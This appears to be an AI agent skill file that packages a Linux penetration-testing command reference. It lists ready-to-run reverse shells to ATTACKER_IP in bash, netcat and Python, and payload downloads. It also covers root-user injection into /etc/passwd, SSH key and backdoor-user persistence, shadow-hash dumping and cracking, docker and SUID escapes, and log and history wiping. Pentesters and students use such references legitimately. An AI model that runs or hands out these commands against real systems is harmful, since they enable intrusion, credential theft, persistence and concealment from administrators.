Practical Linux command reference for penetration testing including reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation techniques
---
name: linux-pentester-commands
description: Practical Linux command reference for penetration testing, reconnaissance, exploitation, and privilege escalation
triggers:
- how do I enumerate services on a Linux target
- show me privilege escalation commands for pentesting
- what are common recon commands for Linux systems
- help me with post-exploitation techniques on Linux
- how to find SUID binaries for privilege escalation
- what commands should I use for network reconnaissance
- show me Linux exploitation commands
- how to perform local enumeration on a compromised system
---
# Linux Pentester Commands Skill
> Skill by [ara.so](https://ara.so) — Security Skills collection.
## Overview
The **Linux for a Pentester** repository is a comprehensive, hands-on collection of Linux commands and techniques specifically curated for penetration testing workflows. It provides practical command references organized by testing phases: reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation.
This is a reference repository meant for quick lookups during active penetration tests, CTFs, and security assessments. All content focuses on real-world usage with actual flags and troubleshooting notes.
## Installation & Setup
```bash
# Clone the repository
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
# Navigate to the directory
cd Linux-for-a-Pentester
# Browse modules by phase
ls -la
```
The repository is organized into directories by testing phase. Each directory contains markdown files with commands, explanations, and practical examples.
## Repository Structure
```
Linux-for-a-Pentester/
├── 00-General-Commands/ # Daily survival commands
├── 01-Recon/ # Reconnaissance phase
├── 02-Enumeration/ # Service and user enumeration
├── 03-Exploitation/ # Initial access techniques
├── 04-Privilege-Escalation/ # Escalation to root
├── 05-Post-Exploitation/ # Persistence and lateral movement
└── Cheatsheets/ # Quick reference one-liners
```
## Key Command Categories
### General Commands (00-General-Commands)
Essential Linux survival commands for navigation and file operations:
```bash
# System information
uname -a # Kernel and system info
cat /etc/os-release # Distribution details
whoami # Current user
id # User and group IDs
# File operations
find / -name "*.conf" 2>/dev/null # Find config files
grep -r "password" /var/log 2>/dev/null # Search for passwords
ls -lah # Detailed listing with hidden files
# Process management
ps aux # All running processes
ps -ef --forest # Process tree view
top # Interactive process viewer
```
### Reconnaissance (01-Recon)
Local and network reconnaissance commands:
```bash
# Network interfaces and connections
ip a # IP addresses and interfaces
ip route # Routing table
ss -tulpn # Listening ports and services
netstat -ano # Network connections (older systems)
# Network discovery
ping -c 3 192.168.1.1 # Check host availability
arp -a # ARP cache
for i in {1..254}; do ping -c 1 192.168.1.$i & done # Ping sweep
# DNS and service discovery
nslookup target.com
dig target.com ANY
host target.com
# Port scanning (if nmap available)
nmap -sV -sC -p- 192.168.1.10 # Full port scan with version detection
```
### Enumeration (02-Enumeration)
Deep service and system enumeration:
```bash
# User enumeration
cat /etc/passwd # All users
cat /etc/group # All groups
w # Logged in users
last # Login history
lastlog # Last login per user
# File system enumeration
find / -perm -4000 -type f 2>/dev/null # SUID binaries
find / -perm -2000 -type f 2>/dev/null # SGID binaries
find / -writable -type d 2>/dev/null # World-writable directories
find /home -type f -name ".*" 2>/dev/null # Hidden files in home dirs
# Service enumeration
cat /etc/services # Service to port mappings
systemctl list-units --type=service # Running services (systemd)
service --status-all # All services (SysV init)
# Installed software
dpkg -l # Debian/Ubuntu packages
rpm -qa # RedHat/CentOS packages
which gcc python python3 perl ruby # Available compilers
# Scheduled tasks
cat /etc/crontab # System cron jobs
ls -la /etc/cron.* # Cron directories
crontab -l # User cron jobs
```
### Exploitation (03-Exploitation)
Initial access and exploitation techniques:
```bash
# Reverse shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 # Bash reverse shell
nc -e /bin/bash ATTACKER_IP 4444 # Netcat with -e
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 4444 >/tmp/f # Netcat without -e
# Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# Shell upgrade (after initial access)
python -c 'import pty;pty.spawn("/bin/bash")' # PTY shell
export TERM=xterm # Terminal type
Ctrl+Z # Background shell
stty raw -echo; fg # Disable echo, foreground
stty rows 38 columns 116 # Set terminal size
# File transfer
# On attacker: python3 -m http.server 8000
wget http://ATTACKER_IP:8000/exploit.sh
curl -O http://ATTACKER_IP:8000/exploit.sh
# On attacker: nc -lvnp 4444 < file
nc ATTACKER_IP 4444 > file # On target
# Credential hunting
grep -ir "password" /var/www/html 2>/dev/null
find / -name "*.db" -o -name "*.sql" 2>/dev/null
cat ~/.bash_history # Command history
env | grep -i pass # Environment variables
```
### Privilege Escalation (04-Privilege-Escalation)
Techniques to escalate to root privileges:
```bash
# Automated enumeration scripts
# Upload and run LinPEAS, LinEnum, or similar
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Manual SUID/SGID checks
find / -perm -u=s -type f 2>/dev/null # SUID binaries
find / -perm -g=s -type f 2>/dev/null # SGID binaries
# Sudo privileges
sudo -l # List sudo permissions for current user
# Writable /etc/passwd (rare but effective)
openssl passwd -1 -salt xyz password123 # Generate hash
echo 'newroot:HASH:0:0:root:/root:/bin/bash' >> /etc/passwd
# Exploitable capabilities
getcap -r / 2>/dev/null # Find capabilities
# Cron job abuse
cat /etc/crontab
ls -la /etc/cron.*
# Check if writable cron scripts exist
# PATH hijacking
echo $PATH
# If writable directory in PATH, create malicious binary
# Kernel exploits (last resort)
uname -a # Check kernel version
searchsploit linux kernel 4.4.0 # Search for exploits
# NFS misconfiguration
cat /etc/exports # Check for no_root_squash
showmount -e TARGET_IP # Remote NFS shares
# Docker escape (if in docker group)
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```
### Post-Exploitation (05-Post-Exploitation)
Persistence, cleanup, and lateral movement:
```bash
# Persistence via SSH keys
mkdir -p ~/.ssh
echo "ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# Backdoor user creation
useradd -m -s /bin/bash backdoor
echo "backdoor:password" | chpasswd
usermod -aG sudo backdoor # Add to sudo group
# Credential harvesting
cat /etc/shadow # Password hashes (requires root)
unshadow /etc/passwd /etc/shadow > hashes.txt # For John/Hashcat
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Network pivoting
# SSH tunneling
ssh -L LOCAL_PORT:TARGET:TARGET_PORT user@pivot_host # Local forward
ssh -R REMOTE_PORT:TARGET:TARGET_PORT user@pivot_host # Remote forward
ssh -D 8080 user@pivot_host # SOCKS proxy
# Covering tracks
history -c # Clear command history
rm ~/.bash_history # Delete history file
# Modify timestamps
touch -r /reference_file /modified_file
# Clear logs (high suspicion)
echo "" > /var/log/auth.log
```
## Common Patterns & Workflows
### Standard Pentesting Workflow
```bash
# 1. Initial Reconnaissance
whoami && id
uname -a
cat /etc/os-release
# 2. Network Discovery
ip a
ip route
ss -tulpn
# 3. User and File Enumeration
cat /etc/passwd
find / -perm -4000 -type f 2>/dev/null
# 4. Check Sudo Permissions
sudo -l
# 5. Search for Credentials
grep -ir "password" /var/www /opt /home 2>/dev/null
cat ~/.bash_history
# 6. Upload and Run Automated Script
wget http://ATTACKER_IP/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeas_output.txt
# 7. Exploit Finding
# Based on linpeas output, exploit SUID, sudo, cron, etc.
# 8. Stabilize Access
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# 9. Establish Persistence (if authorized)
mkdir -p ~/.ssh
echo "PUBLIC_KEY" >> ~/.ssh/authorized_keys
```
### Quick SUID Exploitation Example
```bash
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Check GTFOBins for exploitation
# Example: if /usr/bin/find has SUID
/usr/bin/find . -exec /bin/sh -p \; -quit
# Example: if /usr/bin/vim.basic has SUID
/usr/bin/vim.basic -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
```
### Credential Hunting Pattern
```bash
# Search common locations
find /var/www /home /opt -type f \( -name "*.conf" -o -name "*.config" -o -name "*.xml" \) -exec grep -i "password" {} + 2>/dev/null
# Database files
find / -name "*.db" -o -name "*.sql" -o -name "*.sqlite" 2>/dev/null
# History files
cat ~/.bash_history ~/.mysql_history ~/.psql_history 2>/dev/null
# Environment and process info
env | grep -i pass
ps aux | grep -i pass
```
## Troubleshooting
### Command Not Found Issues
```bash
# If standard tools missing, check for alternatives
which nc netcat ncat # Netcat variants
which wget curl # Download tools
which python python2 python3 # Python versions
# Use absolute paths if PATH is restricted
/usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash")'
/bin/bash -i
```
### Permission Denied Errors
```bash
# Use 2>/dev/null to suppress permission errors
find / -name "flag.txt" 2>/dev/null
# Check current user context
id
groups
sudo -l
```
### Shell Stability Issues
```bash
# If shell keeps dying, try different reverse shell methods
# Use script command for better PTY
script /dev/null -c bash
# If Ctrl+C kills shell, use proper upgrade:
python -c 'import pty;pty.spawn("/bin/bash")'
# Then: Ctrl+Z
stty raw -echo; fg
export TERM=xterm
```
### Network Access Restrictions
```bash
# Check firewall rules
iptables -L -n
nft list ruleset
# Check if egress filtering exists
nc -zv ATTACKER_IP 80 443 8080 4444 # Test common ports
# Try alternate protocols
# DNS tunneling, ICMP tunneling if TCP/UDP blocked
```
## Best Practices
1. **Always redirect errors**: Use `2>/dev/null` to avoid cluttering output with permission errors
2. **Document findings**: Save command output with `| tee output.txt`
3. **Check permissions first**: Use `sudo -l` and `id` before attempting privilege escalation
4. **Stabilize shells immediately**: Upgrade to PTY shell as soon as you get initial access
5. **Use automation wisely**: Run LinPEAS/LinEnum but understand manual enumeration
6. **Stay in scope**: Only use these commands within authorized testing boundaries
## Security Notice
⚠️ **IMPORTANT**: These commands and techniques are for authorized penetration testing, security research, and educational purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing.
## Additional Resources
- Reference GTFOBins (https://gtfobins.github.io/) for SUID/sudo exploitation
- Use searchsploit for finding kernel exploits: `searchsploit linux kernel`
- Check HackTricks (https://book.hacktricks.xyz/) for detailed exploitation guides
- Practice in legal environments: HackTheBox, TryHackMe, PentesterLab
Creator's repository · aradotso/security-skills